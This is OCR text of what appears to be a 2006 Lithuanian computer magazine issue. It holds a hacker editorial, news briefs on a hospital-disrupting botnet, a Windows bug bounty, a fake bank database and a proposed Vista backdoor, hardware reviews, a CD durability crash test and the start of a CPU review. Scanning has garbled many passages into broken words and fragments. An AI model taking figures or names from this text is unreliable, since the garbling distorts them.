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Kokio vieta po saule Užima hakeriai? Ar b iu esu Kuo nors išskirtinis? leškojau atsakymo į 
į klausimą miesto gatvėse, interneto diskusijose, skambinėdamas telefonu... Bei atsakymo 
laip ir nesužinojau. Nuvykau į CeBIT 2006 — čio atsakymą tikrai turėčiau rasti (taip maniau) 


lūms. 


šimt didžiulių pastatų, so manimi šnekėjosi Ik 
u kai ištardavau žodi „hakeris“, visi lik Išsprogdindavo akis ir klausiamai gūžčiodovo pečiais. Tai kas 


gi iš lo, kad aš kokeris 


Nuktaipė į azijiečių (Kinijos, Tailando, Vietnamo ir L.t.) stendus — čio milijonai klaviatūrų, pelių ir 
visokio šlamšto, kurį būtų galima prijungti, prikobinti or net prilipdyti prie namuose likusio kompiuterio 
Tačiau ir čia niekas nekreipė dėmesio į mane. Hakeris visiems skamba panašiai kaip prancūziškų bandelių 
kopė ms nebuvo jokio skitumo kas aš, svarbiausia - kad bent kelias minutes pastovėčiau prie 
stendo ir pasidomėčiau naujausiomis kompiuterinėmis technologijomis mėjau, bat nieko įdomaus 
nepamačiou, 


visi 


Gijžęs namo dar ilgai galvojau, kodėl niekam neįdomu, kad aš hakeris, Pi 


tą kartų pelės klavišus it surinkau 7 eilutes teks 


au prie Jydrojo monito- 


riaus ekiono, paspaudžiau k Koduoto. Suveikė. Sėdžiu 


it mūstau, kad esu hakeris. Ir supratau, kad hakeriai dieną virsta paprastais žmonėmis, kurie niekam 


neužkliūna. Mes tik naktimis tampame savo kompiuterių įkaitais 


ukite Iš pie tai, kaip „hakeris“ gretinamos su „vilkolokiu“ dėl savo veiksmų tamsiu paros 
me 


Joker 
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HAKERIS IŠVEDĖ IS | 
RIKIUOTĖS LIGONINĖS TINKLĄ 


Sietle vasario mėnesį prasidėjo dvidešimtmečio Kalifomijos gy 
ventojo Kristoferio Maksvelo bylos svarstymas. Jis kaltinamas 
botų tinklo sukūrimu, kuris tapo vienos vietinės ligoninės kom- 
piuterių tinklo išėjimo iš rikiuotės priežastimi. Botnetas pagrin- 
de buvo sudarytas iš įvairių universitetų kompiuterių, hakeris jį 
naudojo reklaminių paslaugų teikimui programinės įrangos ga- 
mintojams. Per keletą mėnesių darbo Kristoferis gavo maždaug 
100 tūkstančių dolerių. Tačiau kai dėl jo trojano ligoninės in- 
tensyvios terapijos skyriuje išsijungė kompiuterinė aparatūra, 0 
operacinių durys užsiblokavo, prie tyrimo prisijungė FTB. Niek- 
šelio paieškos truko neilgai. Kadangi hakerio veiksmai galėjo 


kainuoti ne vieno žmogaus gyvybę, bausmė žada būti rimta. 
Bent jau kaltintojai nusiteikę griežtai 


10 TŪKSTANČIŲ UŽ 
NAUJĄ „WINDOWS“ KLAIDĄ 


Jeigu tu kietas hakeris, kuris gali nulaužti visą pasaulį, tačiau 
tavo kišenėje vartosi tik smulkūs pinigai, o šaldytuve guli tik 
sudžiūvusi dešrelė, tau tikrai verta aplankyti kompanijos „iDe- 
ce“ svetainę. Jie tiria kompiuterių saugumą ir jau ilgokai 
apdovanoja tuos, kurie jiems atsiunčia informaciją apie nau 
jus skirtingos PĮ pažeidžiamumus. Dabar kompanija suorga- 
nizavo konkursą, kurio dalyviai gali užsidirbti 10 tūkstančių 
dolerių, jeigu atsius naujo kritiško „Windows“ pažeidžiamu 
mo aprašymą. Surasi du pažeidžiamumus gausi 20 tūks: 
tančių. Svarbiausia kad jie būtų iš tiesų kritiški, kas reiš: 
kla, kad pagal „Microsoft“ apibrėžimą kirminai juos gali pa- 
audoti savo plitimui be vartotojo įsikišimo. Šis konkursas 
truks iki 2006 metų kovo 31 dienos, apdovanojimų kiekis 
neribotas. Šiaip jau „iDefence“ kiekvieną ketvirtį pasirenka 
naują „auką“ ir siūlo hakeriams joje surasti naujų skylių. Sa- 
vaime suprantama, už pinigus. Taigi dabar įsilaužėliai gali 
rinktis: savo eksploitus galima pardavinėti juodojoje rinkoje, 

galima ir legaliai užsidirbti, pasinaudojant savo protu bei 
dalyvaujant tokio tipo hakeriškose rungtynėse. 
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DUOMENŲ BAZIŲ AFERA 


žinia, pas mūsų Rytų kaimynus Rusijoje galima nusipirkti 
eiai nuo branduoliniu bombų iki duomenų bazių su pač 
įvairiausia konfidencialia informacija. Tačiau apie bor 
dien mes nešnekėsime, pakalbėkime apie bazes... 
apie vieną jų rinkoje sukėlė nemažai triul 
Šviežia Centrinio banko klientų duom 
mis 2005 metų pradžioje buvo v ai laukiamų ir 
reikalaujamų, aina pirm s dienomis pakilo iki 
2000 dolerių. Ją S 
is, dabar jos kair 4 (apie 400 
J). Tačiau sukčiai ir komers augėsi be 
reikalo. Neseniai sužinota, jog Š n az; ra netikra. 
Kažkoks ypač nuovokus programu 
gramą, kuri pagal šabloną iš senos analc 
visus lent ulpelius (daug 


tai klastotė. Reiktų pareikšti pagarba aferistams 

duomenų bazių padirbinėjimu dar niekas neužsiiminėj 

dėl vaikinai užsidirbo pakankamai pinigų, kad artimiausius me 

tus negalvotų apie darbą. ar kas nors iš nukentėjusiųjų 

bandys juos kaltinti kas norėtų prisipažinti įsigijęs nelegalią 

prekę? Kita vertus, stabili duomenų bazių rinka po šito jau 
kas negarantuos, kad kita išleista duo: 

su žmonių mobiliųjų telefonų, gyvenamosios vie: 

klastota 


menų bazė 
tos ir kita informacija r 


AR „VISTAI“ REIKIA SKYLIŲ? 


Didysis Brolis vis nerimsta. Ir taip jau visi po padu, bet ne, jam vis 
dar maža. Praėjusį mėnesį britų wriausybė bandė „Microsoft“ įti 
kinti į jos būsimą produktą Windows Vista idiegti specialias 
skyles, kurios prireikus padėtų vyriausybiniams hakeriams patekti į 
piktavalio kompiuterį ir ten surinkti kompromituojančią medžiagą 
Britams pasirodė, kad naujoji operacinė sistema bus per daug 
saugį, 0 tai nėra gerai. Aš tik nesuprantu, kaip jie ruošiasi šią skylę 
išlaikyti paslaptyje? Juk vos tik Vista bus pradėta pardavinėti, ją 
tuojau pat iki paskutinio kaulelio išnarstys viso pasaulio specialis 
tai, ir tokios skylės taps visuomenės nuosavybe. Taip pat neaiški 
teisinė pusė. Juk klausytis telefono linijų teisėsaugos organai gal 
k su specialiu leidimu, o kaip tuomet bus su kapstymusi sveti 
muose kompiuteriuose? „Microsoft“ pareiškė, kad jos naujoji sis- 
ema bus saugiausia iš visų kada nors jos sukurtų sistemų, tačiau 
tuo pačiu neatsisakė ir bendradarbiauti su vyriausybe. 
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„GO0GLE“ PAKEIS „FLASH“ 
ATMINTIES KORTELES IR 
DISKELIUS 


J tau atsibodo kartu su savim nešiotis flash atmintis ir diske- 
lius, tai naujasis Google servisas kaip tik tau. Paieškos kompani- 
ja siūlo iš savo svetainės parsisiųsti programą Google Desktop, 
uria tu galėsi per atstumą ieškoti informacijos ne tik savo, 
r savo draugų, pažįstamų, giminaičių kompiuteriuose... žo- 
pas visus, kas tau tai leis. Tiesa, už patogumą reikės mokė- 
pinigais, o rizika. Dalis konfidencialios vartotojo informaci- 
jos bus saugoma Google serveriuose, todėl jeigu koks nors hake- 
ris įsigudrins nulaužti kompanijos tinklą, tu gali atsidurti aukų 
sąraše. Dar vienas BET yra tai, kad gavę teismo leidimą, teisė- 
jos organai gali pasinaudoti šiais archyvais ir sužinoti aple 
tave ką nors negero. Be abejo, Google tvirtina, kad jokiu būdu 
neketina valdžios organams išdavinėti konfidencialių duomenų, 
tačiau ar mes galime ja pasitikėti? Spręsk pats. Kompanijos va- 
dybininkas Sundaras Pikai žada, kad vartotojiška informacija ser- 
veriuose bus saugoma ne ilgiau kaip 30 dienų. Papildoma Goog 
sktop galimybė — tu gali savo darbastalyje įdiegti nedidelį 
langeli, kuris periodiškai parodo įvairią naudingą informaciją: orų 
prognozę, naujienas, afišas, reikalingą reklamą ir t.t. Išsamiau 
apie naują servisą sužinoti gali čia: http://desktop.google.com). 


Google 


Desktop 


MndopuaunA B HyOKO€ apeus, 
Npauo Ka paloueu cTone 


SUSIPAŽIN 


Kai rinkoje atsiranda nau 
reklamuoti, d jos prekinis ženklas išpopuliarėtų tarp vartotoj 
0 gaminami įrenginiai būtų išperkami kaip karšti pyragėliai 
gamina jaunimui labai patrauklius įrenginius, kadangi pa- 
grindiniai jų privalumai yra minimali kaina ir maksimalios gali- 
du grotuvai: Direc MF6887 ir D2 
turintis 512 Mb atminties ir 2, 
lame galima peržiūrinėti filmus ir nuc 
dorius ir FM radijo imtuvas šį įrengi- 
nį padaro iš tiesų daugiafunkciniu. Įrenginys turi AV įėjimą, kor- 
puso aul įrenginys įdomesnis. Šis 
grotuvas diskinis, tačiau nemanyk, kad tai seniena! Juk diskai 
būr Ei, li atkurti DVD, garso CD, VCD, 
L RW diskus. 
ns prieinami efektai: sulėtintas ir 
vaizdo pa 
dangtelio 
išorinių įrengi- 


tai flash įrei 
colio įstrižainės 


i ant 

. Prisijungimui prie 
ra kompozitinis vaizdo išėji 
ja. Grotuvas gali veikti tiek maitinamas 


skaitmeninė g 


lektros tinklo, tiek iš akumuliatorių (taip pat ir automobilio), jo 


gabaritai: 26.6x18.3x2.8 cm. 


RAUDONOJO 
KRYŽIAUS PASIPIKTINIMAS 


Medikai — taip pat žmonės 
kartais pavargsta, kartais liū 
di. Štai kanadiečių „Raudo- 
najame Kryžiuje“ (organizaci 
ja, garsėjanti savo 
gumu ir pagalbos teikimu ser 
gantiesiems) dirbantiems vai 
kinams taip pat pasidarė liūd 
na. Jie nusprendė pakelti 
skandalą dėl jų emblemos 
panaudojimo kompiuteriniuo: 
se žaidimuose. Dabar raudo- 


ną kryželį naudoja visi: nuo Meierio iki Karmako. Ant virtualaus 
požemio sienos dėžutę su raudonu ženkleliu suradęs žaidėjas 
gali būti tikras, kad čia jis gali papildyti savo gyvybes, pailsėti ir 
apskritai susitvarkyti. Vis dėlto Kanados Raudonojo Kryžiaus filia: 
lo atstovas Deividas Pretas tai laiko išniekinimu. Savo interviu 


laikraščiui „The Vancower Sun“ jis pareiškė, kad tarptautinės or 
ganizacijos simbolikos naudojimas vaizdo žaidimuose griauna jos 
autoritetą. „Juk Raudonasis Kryžius, — tęsia Deividas, — tai pri 
pažintas neutraliteto, saugumo ir humanizmo simbolis“. Žodžiu, 
humanizmo simbolis tvirtai nusprendė teistis su visais, kas žaidi- 
muose pieš raudonąjį kryželį. Gerai, kad tai bent jau netaikoma 
mums, paprastiems mirtingiesiems. Aš vakar užrašų knygutėje 
su raudonu markeriu nupiešiau kryželį kad tik dabar manęs 
nepasodintų. 
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19 „ASUS“ COLIŲ 


Šiandien didelis ir kokybiškas monitorius — tai ne svajonės, o 
realybė. Pardavime jų daug, todėl yra iš ko rinktis: skirtingi ga 
mintojai, skirtingos charakteristikos, skirtingos ir kainos. Tačiau 
jeigu visa ši įvairovė tavęs netenkina, tuo- 
met atkreipk dėmesį į kompanijos 
„Asus“ naujovę — 19 colių SK ekra 
ną PW191. Jame įdiegta firminė 
technologija SPENDID, kuri pastebi- 
mai padidina spalvų gylį ir intensy- 
vumą realiu laiku, kas įmanoma dėl 
ištobulinto vaizdo elementų apdo- 
rojimo algoritmo. Įdomi monito- 
riaus ypatybė yra Zero Bright Dot 
garantija, pagal kurią trijų metų ei- 
goje monitorius bus pakeistas, jei- 
gu jame atsiras ryškių taškų 
Techninės įrenginio savybės to- 
kios: atsako laikas siekia 8 m: 
kontrastingumas — 600:1, ryš- 
kumas — 330 kd/m“ 2, DVI ir 
D-SUB išėjimai, ausinių lizdas. 
Įrenginys atitinka Energy Star 
standartą, jo gabaritai 
520x490x285 mm 
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MOBILIOSIOS VAIZDO PLOKŠTĖS 


Ar turi mobilųjį telefoną? Manau, kad atsakymas bus teigia 
O tavo tėvai, draugės ir draugai turi? Veikiausiai irgi 
Dabar mobiliųjų daugybė, o kompanijų gamintojų naujovių 
leidimo planai prilygsta napoleoniškiesiems. Dėl to suprasti, 
kokia tai patraukli rinka, visiškai nesudėtinga. Tai supranta ir 
ai žinomoje kompanijoje „nVidia“, kuri pranešė apie grei- 
4 savo mobiliesiems telefonams skirtų grafinių mikrosche 
GeForce išleidimą. Pilnas įrenginio pavadinimas — nVi 
Force 5500. Čia bus 1024x768 skiriamoji geba, 10 
apikselių skaitmeninė kamera, aparatinis vaizdo ir garso 
bylų dekodavimas ir net 
3D garso atkūrimas. 
| Techninės mikrosche- 
| 
| 


mos charakteristikos: 
90 nm technologinis 
procesas, 200 MHz 
branduolio dažnis, 128 
| bitų atminties magistra- 
lė, 640 Kb įmontuotos 
| atminties (priklausomai 


„4 nuo modelio išorinė bus 
— nuo 2 iki 32 Mb) 
įmontuo! atminties 


xrtelių valdiklis, gabaritai — 10x12x1.4 mm. Taigi greitai 
ilusis telefonas 10gų atžvilgiu galės rungtyniauti su 
mų priedais ir uteriais. Mobilieji telefonai su nVi 


dia GeForce pasirodys šių metų gruodį. 
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MEDINIS TETRIS 


Vargu ar šioje planetoje atsiras žmogus, kuris nė karto nėra gir- 
dėjęs apie „tetrį“ (be abejo, nekalbu apie afrikiečių kanibalus ir 
Tolimosios Šiaurės gyventojus). „Brave Space“ baldų kompani- 
jos dizaineriai taip pat žino ir mėgsta šį žaidimą, o kadangi jie vis 
dėlto yra dizaineriai ir neretai pasitelkia į pagal kūrybišką 
mąstymą, eilinę darbo dieną žaidžiant „tetrį“ jiems į galvą šovė 
geniali idėja: kodėl „tetrio“ principu nesukūrus ko nors naudin- 
£0? Taip pasaulio šviesą išvydo pati įdomiausia pasaulyje knygų 
lentynėlė. Ši interjero detalė susideda iš keleto medinių „tetrio“ 
blokų formos modulių. Visa grožybė čia slypi tame, kad iš prad: 

moduliai nėra sutvirtinti tarpusavyje, o nuosavos lentynėlės su- 
rinkimo seka visiškai atiduodama į pirkėjo rankas. Kaip paaiškė- 
jo, „tetrio“ blokai idealiai tinka praktiškai bet kokiems daiktams 
saugoti — apatiniuose skyriuose galima sudėti dėžutes su CD 
esnėse lentynėlėse — knygas ir taip toliau. 


arba DVD, 0 aul 
Tuo pačiu blokus galima pasukti, taip gaunant tai ilgas ir žemas, 
tai trumpas ir aukštas nišas, taip pat tarp blokų palikti tuštumas, 
taip sukuriant naujas daiktams susidėti skirtas erdves. Knygų 
lentynėlė atrodo tiesiog nuostabiai, tuo pačiu ji tau greitai neat- 
sibos, kadangi ją visada galima perrinkti kita seka. Beje, dabar 
atėjo laikas ir blogai naujienai. Šis dizaineriško meno kūrinys 


kainuoja pragariškai brangiai — maždaug 350 žalių už kiekvieną 
modulį, t.y. tam, kad surinktum pilnavertį stelažą, teks išleisti 
mažiausiai tris tūkstančius dolerių :((. Skaudu, bet jeigu aš turė- 
čiau pinigų — būtinai jį nusipirkčiau. 
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REKLAMA KOSMINIU MASTU 


Ką reikia padaryti kompanijai, kad jos biurą ar parduotuv; 
būtų galima pastebėti iš toli? Savaime suprantama, apylinkė: 
se iškabinėti gigantiškus reklaminius plakatus, patį pastatą 
nudažyti ryškia spalva, pridėti daugybę neoninių iškabų, mirk- 
sinčių lempučių ir kitokių šaunių dalykėlių. Tačiau daugeliu 
atvejų taip puošiamos tik pastato sienos, o stogas lieka toks 
pat pilkas ir neišvaizdus, kaip ir anksčiau. Juk niekam mąs 
tančiam sveiku protu nešaus į galvą apžiūrinėti pastatą iš vir- 
šaus... Bent jau taip buvo iki šiol. Dabar milijonai žmonių 
mieste orientuojasi pagal palydovines nuotraukas. Dėl to vik- 
riausios kompanijoms labai parūpo, kaip jų pastatas atrodo 
iš paukščio skrydžio ir, norėdamos savo pastatą išskirti iš ša- 
lia esančiųjų minios, samdosi dažytojus, kad šie jų stogą pa- 
puoštų firmine simbolika. Galbūt greitai idėja b 


ir dykumose, kur kartu su senovės civilizacijų piešiniais 


rodys kilometriniai šiuolaikinių superkorporacijų (pavyzdžiui, 
IBM, „Google“ ir „Microsoft“) logotipai. 


Turėti „šešišimtąjį prestižiška au dabar kalbėsime ne 
apie automobilį, o apie nauja skaitmeninį fotoaparatą 
ber-Shot S600. 6,0 megapikselių vaizdo reformatorius 
Super HAD CCD yra centrinis šio fotoaparato elementas ne 
taip pat įmontuotas 3x optinis vario objektyvas Car! Zeiss 


rio-Tessar, kuris dėl High Sensi užtikrina dide 
jautrumą, sukuria gyvą ir ryškų ob taip pat 
turi didelį (5 cm) SK ekranėlį, naudojam arytiems kad. 
rams peržiūrėti, galingą blykstę ir triukšmų slopinimo funkciją 
Clear RAW Noise Reduction. Jame įmontuota 32 Mb atmin 


ties, galima naudoti Sony Memory Stick Duo arba 
Pro Duo atminties korteles, su kompiuteriu aparatas suju 
mas per USB 
2.0 magistralę. Cyber-Sho 
technologija. 


t dirba su PictBridge 
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LYGIAVERČIAI MAINAI 


Meksikos valdžia jau seniai laikosi nuomonės, kad standartiniai 
kovos su nusikalstamumu metodai neatneša pageidaujamo re- 
to, todėl įvairovės dėlei nusprendė išbandyti alternatyvius 

Neseniai buvo suorganizuota tokia gyventojų nusiginkla- 
programa: kiekvienam į specialų priėmimo punktą atnešu- 
m bet kokį šaunamąjį ginklą mainais bus iškilmingai įteiktas 
naujutėlaitis kompiuteris. Kol kas programa veikia tik Mechike, 
jai skirta viso labo 150 kompiuterių, tačiau jeigu prie keitimo 


vi 


punkto išsirikiuos eilė, tuomet, be jokios abejonės, projekto mas- 
tai bus praplėsti. Tiesa, šiek tiek keista, kad už skirtingas ginklų 
rūšis dovanojami vienodi kompai, reikėtų padaryti taip: atnešei 


pistoletą — še tau sisteminis biuro lygio blokas, o jeigu atvilkai 
zenitinį pabūklą — pasirašyk, ir gausi žiauriai kietą komplektą 
su monitoriumi, pele ir klaviatūra. Be to, man kažkodėl nesitiki, 
gu koks kariūnas po pagalve saugojo automatą, tai, ap: 
Jį į naujutėlaitį kompiuterį, iš esmės pakeis savo gyveni 
ną ir užsiims, pavyzdžiui, web dizainu. Juk kompiuteris piktada- 
ro rankose taip pat ginklas. ir dar koks. 


SPAUSDINTUVAS TULPĖMS 


Elektroninės parduotuvės compactlmpact.com asortimente pa 
rodė unikalus spausdintuvas, kuris skirtas vaizdų spausdini- 
mui ant... gėlių. O Įrenginys pakankamai naudingas. Dabar 


savo mylimai merginai jau galima ne šiaip sau padovanoti kve- 
piančit 


gėlių puokštę, bet tiesiog ant jų užrašyti keletą malonių 
. Tuo pačiu sutaupysi pinigų, kuriuos sumokėtum už atvi- 
Flower Printer vidinės sandaros detalės nėra skelbia- 
iau, sprendžiant iš visko, jis primena įprastinį čiurkšlinį 
isdintuvą, tačiau prieš spausdinimą gėlytę būtina apdoroti 
aliu aliejumi. Taip pat nežinoma, ar įrenginį galima prijung- 
ti prie kompiuterio ir kaip į jį užkrauti naujus vaizdus. Panašu, 
Jog visa tai bus staigmena pirkėjui. Beje, šis stebuklas kainuoja 
nkamai nemažai 1250 amerikietiškų prezidentų, o kiek- 
>nas naujas kartridžas 65 dolerius. Savaime suprantama, 
aidimams namuose toks daikčiukas per brangus, tačiau dau- 
s gėlių salonų gali sau tai leisti, juolab kad tokia paslauga 
Bėlių pirkėjų tiktai bus paklausi. 


RYŠKIOS PAPŪGĖLĖS 


w M 


Kompanija „Viewsonic“ 
stato naujų monitorių 
kurios vedliu tampa 
VX2025wm modelis, o jam 
talkina „Viewsonic VG920' 

VX2025wm turi 20,1 colio 
įstrižainės LCD ekraną, kuria- 
me vaizdą galima t 
iki 1680x1050 r. 
ms. reakcijos lai 
mėgautis kompiuteriniais že 
dimais taip, kaip ik 
padaryti nebuvo įmanoma, 0 


pri- 
ją, 


šis 


šiol to 


800:1 kontrasta 00 cd/m 
ryškumas ir 176 laipsnių kampo stebėjimo zona yra tik „men- 
kučiai“ priedai, kurie puikiai dera prie ypač grakštaus plačiaek- 


ranio monitoriaus. 


Viewsonic VX2025wT 2133 Lt 


Wwww.viewsoniceurope.com 


VISI NORI KOKYBĖS, KOKYBĖS 
IR DAR KARTĄ KOKYBĖS... 


Tai universalus biuro prietaisas, kuris ne tik dovanoja aukš- 
tos kokybės rezultatus, bet ir sutaupo vietos ant mūsų darbo 
stalo. Šis P4350 modelis nėra visiška naujovė — kopijavi- 
mo, spausdinimo ir nuskaitymo aparatu viename jau džiau 
giamės senokai, tačiau vargu ar yra tokių kokybiškų kaip ši 
Juk ant vieno atspausdinto lapo sugula 4 800 dpi kokybės 
rašalo lašelių. Prieš spausdinant nuotraukas, galima jas ap- 
žiūrėti ryškiame LCD ekrane ir net nereikia AK. Speciali 
„Lexmark“ programinė įranga sugeba labai greitai ir papras- 
tai pašalinti tokius nuotraukų defektus, kaip „raudonos akys 
spalvų išplaukimas ar net nuotraukos sumažinimas. 0 48 
bitų 600x2400 dpi „variklis“ atspausdintas nuotraukas Iei- 
džia vėl paversti skaitmeniniu failu, beveik neprarandant ko- 
kybės būtent tokiais parametrais apibūdinami šiame pri 
taise įmontuoti skaitytuvas ir kopijavimo aparatas. 


„Lexmark P4350“ kaina 
410 Lt 
Wwwvw.lexmark.com 
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INTENSO „crash-testas“ 


RAĖJUSIAME NUMERYJE APRAŠINĖJOME 
ETUVOJE DAR NEMATYTOS „INTENSO“ 
OMPANIJOS PRODUKCIJĄ. „INTENSO“ 
PECIALIZUOJASI CD, DVD DISKŲ IR „KIC- 
OUT“ DĖKLŲ GAMYBOJE. APIE PRODUK- 
IJOS ĮVAIROVĘ SMULKIAU JAU RAŠĖME, 
EPAGAILĖJOME DAUG GRAŽIŲ ŽODŽIŲ 
IRDAMI KOMPANIJĄ — JI SENIAI PRIPA- 
NTA VISAME PASAULYJE. BET LIETUVIAI 
EBŪTU LIETUVIAI, JEI TAIP LENGVAI PRI- i 
MTU JIEMS PERŠAMUS DALYKUS. NEPA- 
SIDUODAME MES TAIP LENGVAI PERŠAMAI = 

R ž Testinis stendas 
REKLAMAI, PRIES TAI VISKO NEISBANDĘ a Grindys, stalas, asfaltas, PEUGEOT 306, el. virdulys, akva- 


SAVU KAILIU. riumas, Viskio butelis, mikrobangų krosnelė, žiebtuvėlis, ran- 
kos, kojos ir k.t. 

m Disko paviršiaus skenavimui ir duomenų nuskaitymui nau- 
dojom „Emsa DiskCheck“ programinę įrangą. 


uŪ 


NO ię] OXL 


Lyg šiandien pamenu, kaip prieš daugiau nei 10 me: 
tų važiavau į kitą miesto galą pas vieną pažįstamą 


< tvirtai kišenėje spausdamas poros gigabaitų kietąjį 
Fzį diską. Jis buvo pilnut pilnutėlis, prigrūstas pačios rei- Testai 
“ kalingiausios informacijos, kurią žūtbūt reikėjo sau- 1 Atsparumas įbrėžimams 
giai perkelti į archyvą. Kitame miesto gale gyvenantis 2 pa " i £ 4 
pažįstamas buvo pasirinktas ne atsitiktinai jis tu Ž Acronatės iai Sulos spinduliams 
rėjo CD-R įrenginį. Tikriausiai vienas pirmųjų Kau- 2“ Aa RS vendanari vadėšiui 
ne... CD-R diskas, | kurį turėjo būti perkelta mano = Fi dai Romebiiė Ba (su Kick-Out) 
informacija, buvo šviesiai žalios spalvos, be jokių ski- g tsparumas automobilio padangoms (su Kic 
a riamųjų ženklų ar gamintojo logotipų. Liaudyje tokius 6. Atsparumas automobilio Lp (be Kick-0u9 
| vadindavo „Aoname“ ir jie kainuodavo keliolika litų. LA“ Atsparumas Uli karščiui 
Pilno CD įrašymas truko apie valandą. Dar po kelių LD Atsparumas skilimui 
valandų perrašytos informacijos sutikrinimo, buvo ga 12 pas ies aEO 


lima duomenis iš kietojo disko pašalinti. Nepame 
Iuosiu — tą „noname'ą“ naudojau ne vienerius me- 
tus. Gal būt dėl to, kad jį ypač saugojau, laikydavau Dauguno gaminto 

tik dėžutėje, atsargiai iš jos išiminėdavau, o panau torpą, kuri jie 0 išlaikyti akinę“ savyje duomenų. V 
dojęs vėl saugiai padėdavau atgal. diskų ilgaamžiškumo foktorių nis sluoksi žniousici naudojami a 
Rašydamas šį tekstą apsidairiau aplink — ant stalo guli 
gal 20 CD/DVD. Dauguma jų be dėžučių, užkrauti po- | Miriiiitinlami 
pieriais, žumalais, kavos puodeliais ir t.t, Tarp jų „nona- | žiai 
me'as“ tikriausiai nebūtų išgyvenęs nei dienos, nes da čiau Tik pamaž, 
bartiniai diskai gaminami iš daug atsparesnių medžia- 
gu. Taigi nusprendėme pažiūrėti, kaip prieš brutalią jė- 
gai sugeba atsilaikyti „Intenso“ produkcija. 


sidabrinis arba dalinai 


9 
4 
o 
o 


tų iki įrašymo 


go to. Visa ai vėlgi priklauso nuo laikymo salygų. 
duomen omi į tam tikrą metalo | 
rašomų diskų | 


[Be gailesčio] Testams pasirinkom populiariausią 700 
MB talpos CD-R formatą. „Iškepėme“ 10 vienodų „Win- 
dows XP Professional w/SP2“ kopijų. Kiekvienoje jų bu- 
vo 7218 failų ir 211 katalogų. Atlikus po vieną testą su 
kiekvienu „pacientu“, diskas buvo patikrintas CD/DVD 
diskų paviršiaus skenavimui skirta programa. 


skaičius yra kur kas mai 


UNITS 


1 


Labai dažnai panaudojus diską jis 
lieka gulėti ant stalo, ant jo nume- 
tamas naujas „Hakerio“ numeris, 
ausinės ar kitas kietas daiktas. Kar- 
tais CD nukrenta ant žemės, ant jo 
netyčia užlipama ir t.t. Pabandėme 
imituoti panašias aplinkybes. 
aminą „Intenso“ išlaikė pui- 
kiai. Pamanėm, kad šiek tiek pasi- 
kuklinom braižydami diską ir į pa- 
galbą pasikvietėm porą kolegų. Dis- 
kas tapo nenuskaitomas ;] 


B 


Pavasaris jau beldžiasi į mūsų lan- 
gus ir visą savaitę tiesioginiai saulės 
| spinduliai kaitina antrąjį „pacientą“ 
Diskas puikiausiai nuskaitomas, klai- 
dų — 0. 


Gamintojai nurodo leistiną drėgnu- 
mo lygį CD saugojimui, bet pasitai- 
ko, kad diskas su svarbiais duome- 
nimis užsilieka per naktį automobi- 
lyje ar prie atviro lango lyjant lietui. 
Intenso“ šį testą atlaikė taip pat be 
priekaištų, tiesa, mums baigėsi kiek 
liūdniau iš komandiruotės grižus 
bendradarbiui, kuris savo akvariume 
rado trečiąjį mūsų „pacientą“. 


B a 


mz 


4. 


Labai mėgstu kavą. Karštą kavą. Tfu, 
tfu, tfu, dar nei karto netyčia neiš- 
pyliau kavos ant stalo, bet jei taip 
nutiktų — duomenys „Intenso“ laik- 
menose išliks saugūs. 


5-6. 

Pasakysi nerealu pamesti 
CD važiuojamojoje kelio 
dalyje? Visko pasitaiko, bet 
diskus geriau laikyti saugio- 
je „Kick-Out“ dėžutėje. Au- 
tomobiliui pervažiavus mū- 
sų 5-ąjį „pacientą“, duo- 
menis apsaugojo būtent 
„kik-autas“. Sveikiname! O klaidų. 6-ajam dis- 
kui kiek liūdniau — 420 iš 7218 failų prarado- 
me, bet diskas liko nuskaitomas. 


7. 


Gaisro „Intenso“, kaip ir bet kokio ki- 
to gamintojo diskai, neišgyventų. 2— 
3 sekundės žiebtuvėlio liepsnos dar 
nėra mirtina dozė, bet po 6 sekun- 
džių „Intenso“ tapo nenuskaitomas. 
Ilsėkis ramybėje, 7-asis „paciente“. 


8. 


Diskui nukritus nuo stalo, tiek dis- 
kas, tiek jame esantys duomenys tik- 
rai liks sveiki. Tuo įsitikinom ilgai mė: 
tę 8-ąjį „pacientą“. Ir tik po kelinto 
„gero“ smūgio į sieną diskas skilo. 
Tikiuosi, šefas sienų neapžiūrinės ;) 


9. 


Alkoholis yra blogai 

sveikatai, bei visuomenės gerovei. 

CD/DVD disku paviršius yra padeng- 

tas laku, o alkoholis, benzinas ar tir- 

piklis gali laką pažeisti, bet keli lašai 

„Netyčia“ užtiškę ant „Intenso“ disko d 
bėdų “9 
neprida- * Ž 
rė. 


Ir ne tik jūsų 


10. 


Ž Na taip, nė vienas testas užtikrintai 
„Nnepribaigė“ vokiškos „Intenso“ pro- 
dukcijos. Kažką juk reikėjo daryti... 
Kelios sekundės įspūdingo reginio, 
pusvalandis smarvės, bet 10-asis 
„pacientas“ užtikrintai „nužudytas“. Nebandykite to pakartoti na- 
muose! 


IR 


[Baigiamasis žodis] Nors DVD diskai 
šauniai stumia iš rinkos CD diskus, 
pastarieji vis dar dažnai naudojami dėl 
didelio greičio, mažos kainos ir pato- 
gios talpos. DVD diskų viršutinis sluoks- 
nis (kuriame saugoma informacija) yra 
daug atsparesnis, todėl testams pasi- 
rinkome jautresnius CD diskus. Archy- 
vus tikriausiai patogiau laikyti DVD dis- 
kuose ir saugiose dėžutėse, o laikini 
duomenys (draugui įrašyta muzika ar fil- 
mas, vakarėlio nuotraukos ar referatai) 
puikiai „suguls“ ir į 700 MB CD diską. 
Bet net ir laikina informacija kartais gali 
būti labai svarbi ir nevertėtų pagailėti 
keliu papildomų centų už patikimos 
kompanijos CD diską. Po šio „crash“ 
testo duomenis galėsiu patikėt ir „In- 
tenso“ produkcijai :]. 


" 
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Viena galva gerai, bet būna ir dvi 


[Intro] Procesorius... Kiek per visą kompiuterių istoriją yra kilę ginčų dėl šio sistemos komponen 
dabar jau jų nė nesuskaičiuosi. Ir nors dabar statistinis namų kompiuteris apima platų užduočių spektrą (nuo 
paprasto tekstų surinkimo iki kiečiausių 3D žaidimų ir vaizdo skaitmenizavimo) pirmenybę priklausomai nuo 
vartotojo poreikių kartais perima ir kiti įrenginiai, perkant arba atnaujinant sistemą procesorius vis tiek išlieka 
pirmoje visų kainoraščių vietoje. 

Manau, čia nieko aiškinti nereikia. Kad ir kokią brangią ar galingą vaizdo plokštę tu turėtum, Ji neatskleis 
| nė pusės savo potencialo, jeigu komandas jai perdavinės trejų metų silicio „senukas“. Aš iš viso patyliu 
apie sudėtingus skaičiavimus atliekančias programas :). Štai taip, remdamisi šiomis mintimis, rr 
straipsnyje nusprendėme ištestuoti LGA775 platformai skirtus (taip pat tiek biudžetinius, tiek ir ypač na 
šius) Intel procesorius. 


o svarbumo 


s šiame 


[Testavimo metodika] Norėdami išaiškinti visas silpnas ir stiprias procesorių puses 


